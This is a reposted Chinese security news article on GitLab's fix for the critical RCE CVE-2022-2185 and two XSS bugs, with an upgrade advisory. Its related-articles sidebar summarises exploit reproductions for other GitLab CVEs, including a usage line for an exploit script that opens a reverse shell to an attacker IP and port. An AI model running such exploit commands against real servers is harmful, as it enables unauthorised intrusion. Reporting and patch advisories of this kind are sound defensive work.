GitLab 修复严重的RCE漏洞

最新推荐文章于 2024-09-13 18:35:22 发布
最新推荐文章于 2024-09-13 18:35:22 发布
阅读量679 收藏
点赞数
文章标签: 安全 java git c++ gitlab
原文链接:https://mp.weixin.qq.com/s?__biz=MzI2NTg4OTc5Nw==&mid=2247512696&idx=3&sn=28d8f32cf57de253821034371b037814&chksm=ea948312dde30a0443b57c1103f2a160c6d272166ec1c295bbeebcfcb447959e8e3a1e91c6db&scene=126&&sessionid=0
版权

d0dda570fc15dd9d7cac3497e48a9df3.gif 聚焦源代码安全,网罗国内外最新资讯!

编译:代码卫士

GitLab 修复了一个严重漏洞,可导致攻击者远程执行代码。该漏洞的编号是CVE-2022-2185。

该漏洞的等级为“严重”,出现在GitLab的所有版本中:14.10.5之前的14.0版本、15.0.4之前的15.0版本以及15.1.1之前的15.1版本。

GitLab 在一份安全公告中指出,认证用户可导入恶意构造的项目,从而导致远程代码执行。

该漏洞目前已在最新版本中修复。

3104bacbf7a8d1dd9a8a8c4e422a59db.gif

多个漏洞

GitLab 最新版本还修复了其它多个漏洞,包括两个跨站脚本漏洞。这些漏洞影响 GitLab 社区版和企业版。GitLab 已建议用户升级至最新版本。

GitLab 发布安全公告指出,“我们强烈建议所有运行所述漏洞影响版本的用户,尽快升级至最新版本。如果没有提到某款产品的具体部署形式(汇编、源代码、helm chart等),则意味着所有类型均受影响。”

代码卫士试用地址:https://codesafe.qianxin.com

开源卫士试用地址:https://oss.qianxin.com

推荐阅读

GitLab 企业版修复严重的账户接管漏洞

研究员发现针对 GitLab CI 管道的供应链攻击

GitLab 严重漏洞可用于接管用户账户

GitLab 严重漏洞可导致攻击者窃取runner 注册令牌

逾3万台 GitLab 服务器仍未修复严重漏洞

原文链接

https://portswigger.net/daily-swig/gitlab-patches-critical-rce-bug-in-latest-security-release

题图:Pixabay License‍

本文由奇安信编译,不代表奇安信观点。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。

c30d54912871c84e7e3404cfb809747d.jpeg

c1cb19979316229c4055e7056dab1105.jpeg

奇安信代码卫士 (codesafe)

国内首个专注于软件开发安全的产品线。

   4967dad0a1ddb7b070bef24e4afa7886.gif 觉得不错,就点个 “在看” 或 "赞” 吧~

奇安信代码卫士
关注
Gitlab无需认证RCE漏洞复现CVE-2021-22205)
千寻的博客
11-15 4105
文章目录gitlab介绍漏洞介绍漏洞编号漏洞等级影响版本FOFA 查询环境搭建(vulhub环境搭建)漏洞复现第一步 漏洞检测第二步 dnslog解析第三步 服务器写入文件第三步 反弹shell修复建议免责声明摘抄 gitlab介绍 GitLab是美国GitLab公司的一款使用Ruby on Rails开发的、自托管的、Git(版本控制系统)项目仓库应用程序。 GitLab 是一个用于仓库管理系统的开源项目,使用 Git 作为代码管理工具,并在此基础上搭建起来的 Web服务。 漏洞介绍 由于 GitL
漏洞复现CVE-2021-22205 GitLab 远程命令执行漏洞(RCE)
做自己喜欢的事,并将其发挥到极致!
11-05 2352
0x01 漏洞背景描述 2021年4⽉15⽇,GitLab官方发布安全补丁更新修复GitLab命令执行漏洞CVE-2021- 22205)。由于GitLab中的ExifTool没有对传⼊的图像文件的扩展名进行正确处理,攻击者通过 上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影 响,CVSS评分为9.9。 GitLab 是一个基于 Web 的 DevOps 生命周期工具,它提
Gitlab 远程命令执行RCE漏洞CVE-2021-22205附exp
god_Zeo的安全博客
10-31 6095
0x01 漏洞介绍&原理 GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,是一款Ruby开发的Git项目管理平台。由于在11.9以后的GitLab中,使用了图片处理工具ExifTool,而此图片处理工具又受到了漏洞CVE-2021-22204的影响: 漏洞触发ExifTool功能处,ExifTool是用于从图像中移除元数据的开源工具,在解析上传图像中的元数据时,并没有完全解析某些元数据,导致攻击者上传带有恶意元数据的图片,从而导致远程命令执行。 攻击者可以通过一个存在
GitLab 发布安全修复版本 11.9.7, 11.8.7 和 11.7.11
weixin_33873846的博客
04-11 117
GitLab 为社区版和企业版发布了最新的 11.9.7, 11.8.7 和 11.7.11 版本。官方表示主要是为了修复企业版本中的重要安全问题,虽然社区版不受影响,但为了保持版本号一...
GitLab爆出惊天漏洞,攻击者可轻易操控Pipeline作业!新加坡警方一网打尽,全球黑客犯罪集团六名要犯落网!Mustang Panda升级恶意武器库,亚太地区政府遭严密监视!| 安全周报0913
最新发布
weixin_55163056的博客
09-13 1609
惊爆!Linux遭神秘恶意软件袭击,Oracle Weblogic成挖矿门户!GitLab爆出惊天漏洞,攻击者可轻易操控Pipeline作业!新加坡警方一网打尽,全球黑客犯罪集团六名要犯落网!微软大曝光!79个漏洞补丁齐发,3大Windows漏洞正被黑客疯狂利用!Mustang Panda升级恶意武器库,亚太地区政府遭严密监视!
GitLab修复GitHub import函数中的RCE漏洞
smellycat000的专栏
10-14 461
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士摘要GitLab 中存在一个漏洞,可导致攻击者对GitLab服务器发动多种攻击,包括托管在云上的GitLab.com平台。该漏洞的编号是CVE-2022-2884,CVSS评分为9.9。该漏洞安全研究员 “yvvdwf” 报告,是因为GitLabGitHub 导入数据的方式不正确造成的,可被用于在主机服务器上运行命令。01不安全的impor...
GitLab 修复两个严重的远程代码执行漏洞
smellycat000的专栏
08-24 437
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士DevOps 平台 GitLab 修复了位于 GitLab社区版和企业版发布中的两个远程代码执行漏洞 (CVE-2022-2884)。该漏洞的CVSS评分为9.9,可通过GitHub import API被利用,不过首先需要触发认证。GitLab安全公告中指出,“GitLab 社区版/企业版中存在一个漏洞,影响自11.3.4起至15.1.5(...
Git修复两个远程代码执行漏洞
smellycat000的专栏
01-18 1155
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Git 修复了两个严重漏洞。攻击者在成功利用基于堆的缓冲区溢出弱点后,可利用这两个漏洞执行任意代码。由不受信任的搜索路径弱点引起的影响Git GUI工具的Windows 缺陷可使未认证威胁人员运行不受信任的代码低复杂度攻击。前两个漏洞(位于提交格式化机制中的CVE-2022-41903和位于.gitattributes 解析器中的CVE-2022...
GitLab任意文件读取漏洞复现(CVE-2020-10977)
m0_48520508的博客
12-30 2241
0x00简介 GitLab 是一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,并在此基础上搭建起来的web服务。GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,且具有wiki和issue跟踪功能。使用Git作为代码管理工具,并在此基础上搭建起来的web服务。 0x01漏洞概述 在Gitlab 8.5-12.9版本中,存在一处任意文件读取漏洞,攻击者可以利用该漏洞,在不需要特权的状态下,读取任意文件,造成严重信息泄露,从而导致进一步被攻击的风险。 0x02
GitLab远程代码执行漏洞风险提示(CVE-2022-2185)
qzt961003的博客
07-05 4116
近日, GitLab 官方发布了安全公告,修复GitLab 社区版(CE)和企业版(EE)中的一个远程代码执行漏洞CVE-2022-2185),CVSS 评分 9.9,该漏洞源于授权用户可以导入恶意制作的项目导致远程代码执行,成功利用此漏洞的攻击者可获得服务器权限。目前官方已发布安全版本,建议受影响的用户尽快采取安全措施。...
GitLab之Nginx漏洞修复方案
Quincy.Coder的博客
06-01 595
1、需求:nginx的resolver模块漏洞,涉及nginx版本0.60-1.20 2、解决方案: 替换gitlab自带的nginx,方案比较复杂,会出现较多问题 在gtilab外用nginx最新版再负载一层,这个方案不需要修改很多gitlab原有的配置,被暂时采用 3、具体实践: 下载最新版nginx(传送门->):nginx下载 安装nginx: tar -xzvf nginx-1.21.0.tar.gz cd nginx-1.21.0 ./configure --prefix
CVE-2020-10977:Gitlab v12.4.0-8.1 RCE
05-07
亚搏体育app v12.4.0-12.8.1 RCE 完全基于 ,这对我不起作用,HTML解析的内容似乎很麻烦,因此我将其重写为js。 用法 以通常的方式启动反向shell处理程序,然后使用以下命令运行此脚本: TARGET_URI= " https://target " TARGET_EMAIL_DOMAIN= " laboratory.htb " \ TARGET_USER= " test " TARGET_PASSWORD= " Test pass 123 " \ LOCAL_IP= " 10.10.14.142 " LOCAL_PORT= " 44044 " \ node gitlab_rce.js 可以使用TUNNEL_HOST="127.0.0.1" TUNNEL_PORT="8080"指定代理。 Burp在此调试中特别有用。 这是做什么的 检查目标是否达到 如果提
GitLab任意文件读取漏洞(CVE-2020-10977)POC
01-15
检测脚本
Gitlab 未授权RCECVE-2021-22205)漏洞分析及排查
dayouzi的博客
08-11 1094
GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。但漏洞版本中,GitLab 没有正确验证传递给文件解析器的图像文件,这导致远程命令执行。
CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记
weixin_43311457的博客
10-29 3196
Gitlab任意文件读取导致远程命令执行 漏洞环境搭建-Centos7 1.安装依赖软件 yum -y install policycoreutils openssh-server openssh-clients postfix 2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要) systemctl enable postfix && systemctl start postfix 3.下载gitlab安装包,然后安装 官方下载: CE
CVE漏洞复现-CVE-2021-22205 GitLab未授权 RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-27 1346
2021年4月15日,GitLab官方发布安全补丁更新修复GitLab命令执行漏洞CVE-2021-22205)。由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理,攻击者通过上传特制的恶意图片,可以在目标服务器上执行任意命令,且发现由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用,社区版(CE)和企业版(EE)皆受影响,CVSS评分为9.9。
git代码泄露漏洞修复git代码爬取工具
Daioo 随笔
02-27 3508
前言 一声电话响~网站被报告漏洞!!漏洞报告显示:url漏洞;查了之后发现是我的网站配置下并没有屏蔽隐藏文件夹例如.git等文件夹的访问,甚至可以直接下载隐藏文件夹的内容。然后愉快的解决并有了下文。 解决办法 1.删除.git目录 2.修改Web站点配置文件 对于方案2,我以Nginx服务器举例子,在server{}段内增加如下代码即可 location ~ /\. { deny all; ...
漏洞复现】4. Gitlab exiftool远程命令执行漏洞CVE-2021-22205)复现与分析
Zichel77的博客
03-21 1427
Gitlab是由Gitlab Inc.开发,基于网络的GIt仓库管理工具,且具有wiki和issue跟踪功能,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务,通过Web界面进行访问公开的或私人的项目。2021年4月5日,GitLab官方发布安全更新修复了此GitLab命令执行漏洞CVE-2021-22205)。
GitLab RCE:远程代码执行工具的教育探索
gitblog_00015的博客
06-11 372
GitLab RCE:远程代码执行工具的教育探索 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 Gitlab RCE 是一款针对旧版 GitLab(版本小于等于 11.4.7 和 12.4.0-12.8.1)的远程代码执行漏洞利用工具。该项目同样包含了对 10.4 到 12.8.1 版本的本地文件包含(LFI)漏洞的利用方法。开发者明确指出,该工具仅限于教育和研究用途...
gitlab access token泄露漏洞
05-11
GitLab Access Token 是对 GitLab API 进行身份验证的一种方式。如果 GitLab Access Token 泄露,攻击者可以使用该 Token 访问 GitLab API 并执行一些危险操作,例如获取敏感信息或者更改仓库内容。 为了防止 GitLab Access Token 泄露,可以采取以下措施: 1. 使用 GitLab 的两步验证功能,这样即使 Token 泄露,攻击者也无法访问 GitLab API。 2. 对 Access Token 进行权限控制,只给予最小权限,避免攻击者利用 Token 执行危险操作。 3. 定期更换 Access Token,避免 Token 被攻击者长期利用。 4. 避免将 Access Token 存储在代码库或者公开的文档中,避免泄露。 5. 定期检查 GitLab Access Token 的使用记录,及时发现并处理异常操作。 总之,保护好 GitLab Access Token 对于保护代码库的安全非常重要,应该重视并采取相应的安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值